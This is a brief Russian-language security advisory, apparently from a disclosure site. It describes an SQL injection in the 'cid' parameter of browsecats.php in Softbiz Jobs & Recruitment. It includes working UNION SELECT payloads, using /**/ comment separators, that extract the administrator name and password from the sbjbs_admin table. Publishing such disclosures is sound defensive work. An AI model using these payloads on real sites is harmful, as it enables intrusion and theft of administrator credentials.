Программа: Softbiz Jobs & Recruitment

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cid» сценарием browsecats.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://site.com/browsecats.php?cid=[sql cod] #

user name : 999999%20union/**/select/**/0,sb_admin_name,2,3/**/from/**/sbjbs_admin/*
Password : 999999%20union/**/select/**/0,sb_pwd,2,3/**/from/**/sbjbs_admin/*



Оставить мнение